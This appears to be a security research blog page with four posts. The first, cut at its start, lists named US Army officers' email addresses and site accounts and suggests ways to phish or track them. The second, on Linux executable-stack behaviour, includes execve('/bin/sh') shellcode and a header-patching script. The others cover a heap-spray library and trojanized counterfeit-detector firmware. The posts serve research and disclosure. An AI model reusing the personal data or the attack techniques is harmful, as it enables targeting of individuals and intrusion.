Sony Entertainment Network           9    0.504484
Ask                                  3    0.168161
Gartner                              3    0.168161
Travelers                            2    0.112108
Naymz                                2    0.112108
Posterous                            1    0.056054
 
Interesting to find accounts on the Sony Entertainment Network website; who says the military can’t play PlayStation 🙂
 
I decided that I should focus on something juicier, not just random .mil email addresses. So, I did a little research about high ranking US Army officers, and as usual, Google and Wikipedia ended up being very useful.
 
Let’s start with US Army Generals. Since this was done in 2012, some of them could be retired now.

 
I found some retired ones that now may be working for defense contractors and trusted advisors:

 
Active US Army Generals seem not to use their .mil email addresses on common websites; however, we can see a pattern: almost all of them use orbitz.com. For the retired ones, since we got their personal (not .mil) email addresses, we can see they use them on many websites.

After US Army Generals, I looked at Lieutenant Generals (we could say future Generals):

Maybe because they are younger, they seem to use their .mil email addresses on several common websites, including Facebook.com. Even more, most of their Facebook information is available to the public! I was thinking about publishing the related Facebook information, but I will leave it up to you to explore their Facebook profiles.
 


I also looked for US Army Major Generals and found at least 15 of them:
 
Robert Abrams
Email: robert.abrams@us.army.mil
Found account on site: orbitz.com
Found account on site: washingtonpost.com

James Boozer
Email: james.boozer@us.army.mil
Found account on site: orbitz.com
Found account on site: facebook.com

Vincent Brooks
Email: vincent.brooks@us.army.mil
Found account on site: facebook.com
Found account on site: linkedin.com

James Eggleton
Email: james.eggleton@us.army.mil
Found account on site: plaxo.com

Reuben Jones
Email: reuben.jones@us.army.mil
Found account on site: plaxo.com
Found account on site: washingtonpost.com

David Quantock
Email: david-quantock@us.army.mil
Found account on site: twitter.com
Found account on site: orbitz.com
Found account on site: plaxo.com

Dave Halverson
Email: dave.halverson@conus.army.mil
Found account on site: linkedin.com

Jo Bourque
Email: jo.bourque@us.army.mil
Found account on site: washingtonpost.com

Kev Leonard
Email: kev-leonard@us.army.mil
Found account on site: facebook.com

James Rogers
Email: james.rogers@us.army.mil
Found account on site: plaxo.com

William Crosby
Email: william.crosby@us.army.mil
Found account on site: linkedin.com

Anthony Cucolo
Email: anthony.cucolo@us.army.mil
Found account on site: twitter.com
Found account on site: orbitz.com
Found account on site: skype.com
Found account on site: plaxo.com
Found account on site: washingtonpost.com
Found account on site: linkedin.com

Genaro Dellarocco
Email: genaro.dellarocco@msl.army.mil
Found account on site: linkedin.com

Stephen Lanza
Email: stephen.lanza@us.army.mil
Found account on site: skype.com
Found account on site: plaxo.com
Found account on site: nytimes.com

Kurt Stein
Email: kurt-stein@us.army.mil
Found account on site: orbitz.com
Found account on site: skype.com
 
Later I found about 7 US Army Brigadier General and 120 US Army Colonel email addresses, but I didn’t have time to properly filter the results. These email addresses were associated with many website accounts.
 
Basically, the 1784 total email addresses included a broad list of ranking officers from the US Army.
 
Doing a quick analysis of the gathered information, we can infer the following:
  • Many have Facebook accounts, exposing to the public family and friend relations that could be targeted by attackers.
  • Most of them read, and are probably subscribed to, The Washington Post (makes sense, no?). This could be an interesting avenue for attacks such as phishing and watering hole attacks.
  • Many of them use orbitz.com, probably for car rentals. Hacking this site could give attackers a lot of information about how they move, when they travel, etc.
  • Many of them have accounts on google.com, probably meaning they have Android devices (smartphones, tablets, etc.). This could allow attackers to compromise the devices remotely (by email, for instance) with known or 0-day exploits, since these devices are not usually patched and not very secure.
  • And last but not least, many of them, including Generals, use garmin.com or nikeplus.com. Those websites are related to GPS devices, including running watches. These websites allow you to upload GPS information, making them very valuable to attackers for tracking purposes. They could learn the areas where a person usually runs, travels, etc.

 

 
As we can see, it’s very cheap and easy to get information about ranking members of the US Army. People serving in the US Army should take extra precautions. They should not make their email addresses public and should only use them for “business” related issues, not personal activities.
INSIGHTS | November 27, 2013

A Short Tale About executable_stack in elf_read_implies_exec() in the Linux Kernel

This is a short and basic analysis I did when I was uncertain about code execution in the data memory segment. Later on, I describe what’s happening on the kernel side, as well as what seems to be a small logic bug.
I’m not a kernel hacker/developer/ninja; I’m just a Linux user trying to figure out the reason for this behavior by looking in key places such as the ELF loader and other related functions. So, if you see any mistakes, or you realize that I approached this the wrong way, please let me know; I’d really appreciate that.
This article could also be useful for anyone starting out in shellcoding, since they might think their code is wrong when, in reality, there are other things to take care of in order to test the functionality of their shellcode or any other kind of code.
USER-LAND: Why is it possible to execute code in the data segment if it doesn’t have PF_EXEC enabled?
A couple of weeks ago I was reading an article (in Spanish) about shellcode creation in Linux x64. For demonstration purposes I’ll use this 64-bit execve(“/bin/sh”) shellcode:

#include <unistd.h>

char shellcode[] =
"\x48\x31\xd2\x48\x31\xf6\x48\xbf"
"\x2f\x62\x69\x6e\x2f\x73\x68\x11"
"\x48\xc1\xe7\x08\x48\xc1\xef\x08"
"\x57\x48\x89\xe7\x48\xb8\x3b\x11"
"\x11\x11\x11\x11\x11\x11\x48\xc1"
"\xe0\x38\x48\xc1\xe8\x38\x0f\x05";

int main(int argc, char **argv) {
    void (*fp)();
    fp = (void (*)())shellcode;
    (void)(*fp)();

    return 0;
}

The author suggests the following for the proper execution of the shellcode:
“We compile and, with the execstack utility, we specify that the stack region used in the binary will be executable…”.

Immediately, I thought it was wrong because the code to be executed would be placed in the ‘shellcode’ symbol in the .data section within the ELF file, which, in turn, would be in the data memory segment at runtime, not in the stack segment. For some reason, when trying to execute it without enabling the executable stack bit, it failed; and the opposite when it was enabled:

 

According to the execstack’s man-page:

“… ELF binaries and shared libraries now can be marked as requiring executable stack or not requiring it… This marking is done through the p_flags field in the PT_GNU_STACK program header entry… The marking is done automatically by recent GCC versions”.
It only modifies one bit, adding the PF_EXEC flag to the PT_GNU_STACK program header. This can also be done by modifying the binary with an ELF editor such as HTEditor, or at link time by passing the argument ‘-z execstack’ to gcc.
The change can be seen simply by observing the flags RWE (Read, Write, Execute) using the readelf utility. In our case, only the ‘E’ flag was added to the stack memory segment:

 
The first loadable segment in both binaries, with the ‘E’ flag enabled, is where the code itself resides (the .text section) and the second one is where all our data resides. It’s also possible to map which bytes from each section correspond to which memory segments (remember, at runtime, the sections are not taken into account, only the program headers) using ‘readelf -l shellcode’.

So far, everything makes sense to me. But wait a minute, the shellcode, or any other variable declared outside main(), is not supposed to be in the stack, right? Instead, it should be placed in the section where the initialized data resides (as far as I know, normally .data or .rodata). Let’s see exactly where it is by showing the symbol table and the corresponding section of each symbol (if applicable):

It’s pretty clear that our shellcode will be located at memory address 0x00600840 at runtime and that its bytes reside in the .data section. The same result holds for the other binary, ‘shellcode_execstack’.

By default, the data memory segment doesn’t have the PF_EXEC flag enabled in its program header, which is why it’s not possible to jump to and execute code in that segment at runtime (Segmentation Fault). But when the stack is executable, why is it also possible to execute code in the data segment if it doesn’t have that flag enabled?

 
Is this normal behavior, or is it a bug in the dynamic linker or the kernel that doesn’t take that flag into account when loading ELFs? To take the dynamic linker out of the game, my fellow Ilja van Sprundel gave me the idea to compile with -static to create a standalone executable. A static binary doesn’t pass through the dynamic linker; instead, it’s loaded directly by the kernel (as far as I know). The same result was obtained with this one, so the result pointed directly at the kernel.

I tested this in a 2.6 kernel (x86_64) and in a 3.2 kernel (i686), and I got the same behavior in both.
KERNEL-LAND: Is that a bug in elf_read_implies_exec()?

Now, for the interesting part: what is really happening on the kernel side? I went straight to load_elf_binary() in linux-2.6.32.61/fs/binfmt_elf.c and found that the program header table is parsed to find the stack segment so as to set the executable_stack variable correctly:

int executable_stack = EXSTACK_DEFAULT;

elf_ppnt = elf_phdata;
for (i = 0; i < loc->elf_ex.e_phnum; i++, elf_ppnt++)
        if (elf_ppnt->p_type == PT_GNU_STACK) {
                if (elf_ppnt->p_flags & PF_X)
                        executable_stack = EXSTACK_ENABLE_X;
                else
                        executable_stack = EXSTACK_DISABLE_X;
                break;
        }

Keep in mind that only those three constants about executable stack are defined in the kernel (linux-2.6.32.61/include/linux/binfmts.h):

/* Stack area protections */
#define EXSTACK_DEFAULT    0  /* Whatever the arch defaults to */
#define EXSTACK_DISABLE_X  1  /* Disable executable stacks */
#define EXSTACK_ENABLE_X   2  /* Enable executable stacks */

Later on, the process’ personality is updated as follows:

/* Do this immediately, since STACK_TOP as used in setup_arg_pages
   may depend on the personality.  */
SET_PERSONALITY(loc->elf_ex);
if (elf_read_implies_exec(loc->elf_ex, executable_stack))
        current->personality |= READ_IMPLIES_EXEC;

if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
        current->flags |= PF_RANDOMIZE;

elf_read_implies_exec() is a macro in linux-2.6.32.61/arch/x86/include/asm/elf.h:

/*
 * An executable for which elf_read_implies_exec() returns TRUE
 * will have the READ_IMPLIES_EXEC personality flag set automatically.
 */
#define elf_read_implies_exec(ex, executable_stack) \
        (executable_stack != EXSTACK_DISABLE_X)

In our case, having an ELF binary with the PF_EXEC flag enabled in the PT_GNU_STACK program header, that macro will return TRUE since EXSTACK_ENABLE_X != EXSTACK_DISABLE_X, and thus our process’ personality will have the READ_IMPLIES_EXEC flag. This constant, READ_IMPLIES_EXEC, is checked in some memory-related functions such as those in mmap.c, mprotect.c, and nommu.c (all in linux-2.6.32.61/mm/). For instance, when the VMAs (Virtual Memory Areas) are created by the do_mmap_pgoff() function in mmap.c, it verifies the personality so it can add PROT_EXEC (execution allowed) to the memory segments [1]:

/*
 * Does the application expect PROT_READ to imply PROT_EXEC?
 *
 * (the exception is when the underlying filesystem is noexec
 *  mounted, in which case we dont add PROT_EXEC.)
 */
if ((prot & PROT_READ) && (current->personality & READ_IMPLIES_EXEC))
        if (!(file && (file->f_path.mnt->mnt_flags & MNT_NOEXEC)))
                prot |= PROT_EXEC;

And basically, that’s the reason why code in the data segment can be executed when the stack is executable.

On the other hand, I had an idea: delete the PT_GNU_STACK program header by changing its type to any other random value. Doing that, executable_stack would remain EXSTACK_DEFAULT, and when compared in elf_read_implies_exec(), the macro would return TRUE, right? Let’s see:
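The header tweak itself takes only a few lines. A minimal sketch, assuming a 64-bit little-endian ELF (the header offsets below come from the standard ELF64 layout):

import struct

PT_GNU_STACK = 0x6474e551

def retype_gnu_stack(path, new_type=0xfee1dead):
    data = bytearray(open(path, "rb").read())
    # ELF64 header: e_phoff at 0x20, e_phentsize at 0x36, e_phnum at 0x38.
    e_phoff = struct.unpack_from("<Q", data, 0x20)[0]
    e_phentsize = struct.unpack_from("<H", data, 0x36)[0]
    e_phnum = struct.unpack_from("<H", data, 0x38)[0]
    for i in range(e_phnum):
        offset = e_phoff + i * e_phentsize
        p_type = struct.unpack_from("<I", data, offset)[0]
        if p_type == PT_GNU_STACK:
            # p_type is the first field of the program header entry.
            struct.pack_into("<I", data, offset, new_type)
    open(path, "wb").write(data)

retype_gnu_stack("shellcode")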


The program header type was modified from 0x6474e551 (PT_GNU_STACK) to 0xfee1dead, and note that the second LOAD segment (the data segment, where our code to be executed is) doesn’t have the ‘E’xecutable flag enabled:

 

The code was executed even though the execution flag is not enabled in the program header that holds it. I think it’s a logic bug in elf_read_implies_exec(), because one can simply delete the PT_GNU_STACK header so that executable_stack = EXSTACK_DEFAULT, making elf_read_implies_exec() return TRUE. Instead of comparing against EXSTACK_DISABLE_X, it should return TRUE only if executable_stack is EXSTACK_ENABLE_X:

#define elf_read_implies_exec(ex, executable_stack) \
        (executable_stack == EXSTACK_ENABLE_X)

Anyway, perhaps that’s the normal behavior of the Linux kernel for compatibility reasons or something else, but isn’t it weird that by making the stack executable, or by deleting the PT_GNU_STACK header, all the memory segments are loaded with execute permissions even when their PF_EXEC flag is not set?

What do you think?
Side notes:
  • Kernel developers pass loc->elf_ex to elf_read_implies_exec() but never use it:
#define elf_read_implies_exec(ex, executable_stack) (executable_stack != EXSTACK_DISABLE_X)
  • Two constants are defined but never used anywhere in the kernel code:
#define INTERPRETER_NONE 0
#define INTERPRETER_ELF  2
Finally, I’d like to thank my colleagues Ilja van Sprundel and Diego Bauche Madero for giving me some ideas.
Thanks for reading.
References:
[1] “Understanding the Linux Virtual Memory Manager”. Mel Gorman.
Chapter 4 – Process Address Space.

 

INSIGHTS | November 15, 2013

heapLib 2.0

Hi everyone, as promised I’m releasing my code for heapLib2. For those of you not familiar, I introduced methods to perform predictable and controllable allocations/deallocations of strings in IE9-IE11 using JavaScript and the DOM. Much of this work is based on Alex Sotirov’s research from quite a few years ago (http://www.phreedom.org/research/heap-feng-shui/). 

The zip file contains: 
  • heapLib2.js => The JavaScript library that needs to be imported to use heapLib2
  • heapLib2_test.html => Example usage of some of the functionality that is available in heapLib2
  • html_spray.py => A Python script to generate static HTML pages that could potentially be used to heap spray (i.e. heap spray w/o JavaScript)
  • html_spray.html => An example of a file created with html_spray.py
  • get_elements.py => An IDA Python script that will retrieve information about each DOM element with regards to memory allocation in Internet Explorer. Use this Python script when reversing mshtml.dll. Yes, this is really bad; I’m no good at IDAPython. Make sure to check the ‘start_addr’ and ‘end_addr’ variables in the .py file. If you are having trouble finding the right address, do a text search in IDA for “<APPLET>” and follow the cross-reference. You should see similar data structure listings for HTML tags. The ‘start_addr’ should be the address above the reference to the string “A” (anchor tag).
  • demangler.py => Certainly the worst C++ name demangler you’ll ever see. 
If anyone would like my IDBs or poorly taken notes, just let me know and I’ll send them off. With all that said, I hope at least one person enjoys the library: http://illmatics.com/heapLib2.zip
 
I’d love feedback, comments, suggestions, etc. If you use this library, feel free to buy me a beer if and when you see me.
INSIGHTS | October 28, 2013

Hacking a counterfeit money detector for fun and non-profit

In Spain we have a saying “Hecha la ley, hecha la trampa” which basically means there will always be a way to circumvent a restriction. In fact, that is pretty much what hacking is all about.

 

It seems the idea of counterfeiting appeared at the same time as legitimate money. The Wikipedia page for counterfeit money is a fascinating read that helps explain its effects.

 

http://en.wikipedia.org/wiki/Counterfeit_money

 

Nowadays every physical currency implements security measures to prevent counterfeiting. Some counterfeits can be detected with the naked eye, while others require specific devices or procedures to be identified. To help employees, counterfeit money detectors can be found in places that accept cash, including shops, malls, post offices, banks, and gas stations.

 

Recently I took a look at one of these devices, Secureuro. I chose this device because it is widely used in Spain, and its firmware is freely available to download.
http://www.securytec.es/Informacion/clientes-de-secureuro

 

As usual, the first step in a static analysis of a device like this is to collect as much information as possible, looking for anything that can help us understand how the target works at all levels.

 

In this case I used the following sources:
YouTube
http://www.youtube.com/user/EuroSecurytec
I found some videos in which the vendor explains how to use the device. This let me analyze its behavior: when an LED turns on, when a sound plays, and what messages are displayed. This knowledge is very helpful for understanding the underlying logic later on, when analyzing the assembly.
 
 
Vendor Material
Technical specs, manuals, software, firmware … [1] [2] [3] See references.
The following document provides some insight into the device’s security: http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf (resource no longer available)
Unfortunately, some of these claims are not completely true and others are simply false. It is possible to understand how Secureuro works; we can access the firmware and EEPROM without any hardware hacking, and there is no encryption system protecting the firmware.
Before we start discussing the technical details, I would like to clarify that we are not disclosing any trick that could help criminals bypass the device ‘as is’. My intention is not to forge a banknote that could pass as legitimate; that would be a criminal offense. My sole purpose is to explain how I identified the code behind the validation in order to create ‘trojanized’ firmware that accepts even a simple piece of paper as valid currency. We are not exploiting a vulnerability in the device, just a design feature.
 
 
Analyzing the Firmware
This is the software that downloads the firmware into the device. The firmware file I downloaded from the vendor’s website contains 128K of data to be flashed to the ATMEGA128 microcontroller, so I can load it directly into IDA, although I do not have access to the EEPROM yet.
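As a quick sanity check of the “no encryption” claim, one can eyeball the byte entropy of the image before loading it into IDA. A rough sketch (the file name is an assumption):

# A plaintext AVR image shows low, uneven byte entropy; an encrypted
# blob would be close to 8 bits/byte across the board.
import math
from collections import Counter

data = open('secureuro_firmware.bin', 'rb').read()  # assumed file name
print('size: %d bytes' % len(data))                 # expect 128K

counts = Counter(data)
entropy = -sum((c / len(data)) * math.log2(c / len(data))
               for c in counts.values())
print('entropy: %.2f bits/byte' % entropy)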
 
Entry Points
A basic approach to dealing with this kind of firmware is to identify elements or entry points that can be leveraged to look for interesting pieces of code.
A minimal set includes:
 
Interrupt Vectors 
  1.  RESET == Main Entry Point
  2.  TIMERs
  3.  UARTs
  4.  SPI
Mnemonics
  1.  LPM (Load Program Memory)
  2.  SPM (Store Program Memory)
  3.  IN
  4.  OUT
Registers
 
ADCL: The ADC Data Register Low
ADCH: The ADC Data Register High
ADCSRA: ADC Control and Status Register
ADMUX: ADC Multiplexer Selection Register
ACSR: Analog Comparator Control and Status
UBRR0L: USART Baud Rate Register
UCSR0B: USART Control and Status Register
UCSR0A: USART Control and Status Register
UDR0: USART I/O Data Register
SPCR: SPI Control Register
SPSR: SPI Status Register
SPDR: SPI Data Register
EECR: EEPROM Control Register
EEDR: EEPROM Data Register
EEARL: EEPROM Address Register Low
EEARH: EEPROM Address Register High
OCR2: Output Compare Register
TCNT2: Timer/Counter Register
TCCR2: Timer/Counter Control Register
OCR1BL: Output Compare Register B Low
OCR1BH: Output Compare Register B High
OCR1AL: Output Compare Register A Low
OCR1AH: Output Compare Register A High
TCNT1L: Counter Register Low Byte
TCNT1H: Counter Register High Byte
TCCR1B: Timer/Counter1 Control Register B
TCCR1A: Timer/Counter1 Control Register A
OCR0: Timer/Counter0 Output Compare Register
TCNT0: Timer/Counter0
TCCR0: Timer/Counter Control Register
TIFR: Timer/Counter Interrupt Flag Register
TIMSK: Timer/Counter Interrupt Mask Register
Using this information, we can reconstruct some firmware functions to make the image friendlier to reverse engineering.
First, I try to identify Main by following the flow from the RESET ISR. This step is pretty straightforward.
As an example of collecting information based on the mnemonics, we identify a function reading from flash memory, which I rename ‘readFromFlash‘. Its cross-references provide valuable information.
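The register list above can be put to work the same way. As a rough illustration, a few lines of IDAPython (written against the old IDA 6.x API, and assuming IDA’s AVR module has named the I/O ports) can flag every instruction touching the EEPROM registers:

# Flag every instruction that references one of the EEPROM I/O registers.
from idautils import Heads
from idc import GetDisasm

EEPROM_REGS = ('EECR', 'EEDR', 'EEARL', 'EEARH')

for ea in Heads():
    line = GetDisasm(ea)
    if any(reg in line for reg in EEPROM_REGS):
        print('%#x: %s' % (ea, line))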
By finding the references to the registers involved in EEPROM operations I come across the following functions ‘sub_CFC‘ and ‘sub_CF3‘:

 

The first routine reads from an arbitrary address in the EEPROM. The second routine writes to the EEPROM. I rename ‘sub_CFC‘ to ‘EEPROM_read‘ and ‘sub_CF3‘ to ‘EEPROM_write‘. These two functions are very useful, and provide us with important clues.
Now that our firmware looks a little friendlier, we can focus on the implemented functionality. The documentation I collected states that this device was designed to communicate with a computer, so we should start by taking a look at the UART ISRs.
Tip: You can look for USART configuration registers UCSR0B, UBRR0… to see how it is configured. 
USART0_RX
It is definitely interesting: when receiving a ‘J’ (0x4A) character, it initializes the usual procedure for sending data through the serial interface. It polls UDRE until the transmit buffer is ready and then sends bytes out through UDR0. Going down a little further, I find the following piece of code:
It uses the EEPROM read function I identified earlier. It seems that if we want to understand what is going on, we will have to analyze the other functions involved in this basic block: ‘sub_3CBB‘ and ‘sub_3C9F‘.
 
SUB_3CBB
This function receives two parameters, a length (r21:r20) and a memory address (r17:r16), and transmits the n bytes located at that address through UDR0. It basically sends n bytes out over the serial interface.
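In Python terms, the routine behaves roughly like this (a paraphrase for readability, not a decompilation):

# Rough paraphrase of sub_3CBB: push `length` bytes starting at `addr`
# out over the UART, one byte at a time.
def sub_3CBB(sram, addr, length, send_byte):
    for b in sram[addr:addr + length]:
        send_byte(b)  # on the device: busy-wait on UDRE, then write UDR0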
I rename ‘sub_3CBB’ to ‘dumpMemToSerial‘. So this function is being called as dumpMemToSerial(0xC20, 9). What’s at address 0xC20? Apparently nothing that makes sense to dump, so I must be missing something. What can we do? Let’s analyze the stub code the linker places at the RESET ISR, just before the ‘Main’ entry point; that code usually contains routines for custom memory initialization.
Sure enough, ‘sub_4D02‘ is a memory copy function from flash to SRAM. It uses LPM, which demonstrates how important it is to check specific mnemonics to discover juicy functions.
Now take a look at the parameters: at ROM:4041 it is copying 0x2BD bytes (r21:r20) from 0x80A1 (r31:r30) to 0xBC2 (r17:r16). If we go to offset 0x80A1 in the firmware file, we find a string table!
Knowing that 0xBC2 holds the string table above, my earlier call makes much more sense: dumpMemToSerial(0xC20, 9) => 0xC20 – 0xBC2 = 0x5E
String Table (0x80A1) + 0x5E == “#RESETS”
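That copy-down mapping is worth capturing in a helper for resolving other SRAM pointers back into the firmware image (the constants come straight from the init stub above):

# Resolve an SRAM address inside the copied-down region back to its
# offset in the firmware file: 0x2BD bytes at SRAM 0xBC2 come from 0x80A1.
def sram_to_flash(addr, sram_base=0xBC2, flash_base=0x80A1, size=0x2BD):
    assert sram_base <= addr < sram_base + size
    return flash_base + (addr - sram_base)

print(hex(sram_to_flash(0xC20)))  # 0x80ff -> "#RESETS" in the string table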
The remaining function to analyze is ‘sub_3C9F‘, which basically formats a byte into its ASCII representation before sending it out through the serial interface. I rename it ‘hex2ascii‘.
So, according to the code, if we send ‘J’ to the device, we should be receiving some statistics. This matches what I read in the documentation.
http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf
Now this basic block seems much clearer. It is ‘printing’ some internal statistics:
“#RESETS: 000000” (a three-byte counter)
“#BILLETES: 000000” (“BILLETES” means “BANKNOTES” in Spanish)
“#NO VALIDOS: 000000” (“NO VALIDOS” means “INVALID” in Spanish)
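To verify this against a real device, a quick probe with pyserial might look like the following (the port name and baud rate are guesses; the actual baud rate can be derived from the UBRR0L value in the firmware):

import serial  # pyserial

dev = serial.Serial('/dev/ttyUSB0', 9600, timeout=2)  # assumed port/baud
dev.write(b'J')  # 0x4A triggers the statistics dump
print(dev.read(256).decode('ascii', 'replace'))
dev.close()
# Expected, per the strings recovered above:
#   #RESETS: 000000  #BILLETES: 000000  #NO VALIDOS: 000000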
Wait, hold on a second: the number of invalid banknotes is stored in a three-byte counter in the EEPROM, starting at offset 0xE. Are you thinking what I’m thinking? We should look for the opposite operation: where is that counter incremented? That path should lead us to the code where a banknote is judged valid or invalid 🙂 Keep calm and ‘EEPROM_write’
Bingo!
Function ‘sub_1FEB’ (which I rename ‘incrementInvalid’) increments the INVALID counter. Now I look for the places where it is called.
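Conceptually, the pattern is a plain read-increment-write of a three-byte counter via EEPROM_read/EEPROM_write. A small model (the byte order within the counter is a guess):

INVALID_OFFSET = 0x0E  # three-byte counter in EEPROM

def read_counter(eeprom, off=INVALID_OFFSET):
    return (eeprom[off] << 16) | (eeprom[off + 1] << 8) | eeprom[off + 2]

def increment_counter(eeprom, off=INVALID_OFFSET):
    val = (read_counter(eeprom, off) + 1) & 0xFFFFFF
    eeprom[off], eeprom[off + 1], eeprom[off + 2] = \
        (val >> 16) & 0xFF, (val >> 8) & 0xFF, val & 0xFF

eeprom = bytearray(4096)  # the ATmega128 has 4KB of EEPROM
increment_counter(eeprom)
print(read_counter(eeprom))  # 1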
‘incrementInvalid‘ is part of a branch; guess what’s in the other part?
On the left side of the branch, a variable I renamed ‘note_Value’ is compared against 5 (€5) and 0xA (€10). The right side of the branch leads to ‘incrementInvalid‘. Mission accomplished! We found the piece of code where the final validation is performed.
Without going into details, by digging a little further and checking where ‘note_Value’ is referenced, I easily narrowed the scope of the validation down to two complex functions. The first one assigns ‘note_Value’ a value of either 1 or 2:
The second function takes this value into account when assigning the final denomination. When ‘note_Value’ is equal to 1, the possible banknote values are 5, 10, and 20; otherwise they are 50, 100, 200, or 500. Why?
I need to learn about Euro banknotes, so I take a look at the “Trainer’s guide to the Eurobanknotes and coins” from the European Central Bank http://www.ecb.europa.eu/euro/pdf/material/Trainer_A4_EN_SPECIMEN.pdf
Curious: this classification makes what I see in the code actually make sense. The ECB guide groups the denominations by hologram type, with a foil stripe on the €5–€20 notes and a foil patch on the €50–€500 notes. So maybe, only maybe, the first function is detecting the hologram type, and the second function is processing the remaining security features before assigning the final value. The vendor’s documentation also describes the signals the device measures during validation.
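Putting the two stages together, the recovered logic behaves roughly like the sketch below (the device runs AVR assembly; the function names are my IDA renames and the hologram check is only my hypothesis):

def first_stage(features):
    # Hypothesis: splits notes into two classes, maybe by hologram type
    # (foil stripe on 5-20 EUR vs. foil patch on 50-500 EUR).
    return 1 if features.get('hologram') == 'foil-stripe' else 2

def second_stage(note_class, measured_value):
    candidates = (5, 10, 20) if note_class == 1 else (50, 100, 200, 500)
    return measured_value if measured_value in candidates else None

value = second_stage(first_stage({'hologram': 'foil-stripe'}), 10)
print(value)  # 10 -> accepted; None would lead to incrementInvalid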
Well, what about the six analogue signals the documentation mentions? By checking the registers involved in ADC operations, we can identify an interesting function that I rename ‘getAnalogToDigital‘.
This function receives the ADC input pin as a parameter. As expected, it is invoked, inside a timer, to perform the conversion for six different pins. The remaining three digital signals, which carry information about distances, can also be obtained easily.
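As a mental model (pin numbers and the fake conversion are placeholders), the sampling loop looks something like this:

ADC_PINS = (0, 1, 2, 3, 4, 5)  # the six analogue inputs
samples = {}

def get_analog_to_digital(pin):
    # On the device: select `pin` in ADMUX, start the conversion via
    # ADCSRA, busy-wait until complete, then read ADCL/ADCH (10 bits).
    return (pin * 111) & 0x3FF  # placeholder value

def timer_isr():
    for pin in ADC_PINS:
        samples[pin] = get_analog_to_digital(pin)

timer_isr()
print(samples)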
There are plenty of routines we could continue reconstructing: password, menu, configuration, timers, hidden/debug functionality. But that is outside the scope of this post; I merely wanted to identify one very specific functionality.
The last step was to buy the physical device. I modified the original firmware to accept our home-made IOActive currency, and… what do you think happened? Did it work? Watch the video to find out 😉
The impact is obvious: an attacker with temporary physical access to the device could install customized firmware and cause the device to accept counterfeit money. Taking into account the types of places where these devices are usually deployed (shops, malls, offices, etc.), this scenario is more than feasible.
Once again we see that, when it comes to static analysis, collecting information about the target is as important as reverse engineering its code. Without the knowledge gained by reading all of those documents and watching the videos, the reverse engineering would have been much more difficult.
I hope you find this useful in some way. I would be pleased if this post encourages you to research further or helps vendors understand the importance of building security measures into these types of devices.
References:
 
[1] http://www.inves.es/secureuro?p_p_id=56_INSTANCE_6CsS&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=detalleserie&p_p_col_count=1&_56_INSTANCE_6CsS_groupId=18412&_56_INSTANCE_6CsS_articleId=254592&_56_INSTANCE_6CsS_tabSelected=3&templateId=TPL_Detalle_Producto
[2] http://www.secureuro.com/secureuro/ingles/menuingles.htm#
[3] http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf
[4] http://www.youtube.com/user/EuroSecurytec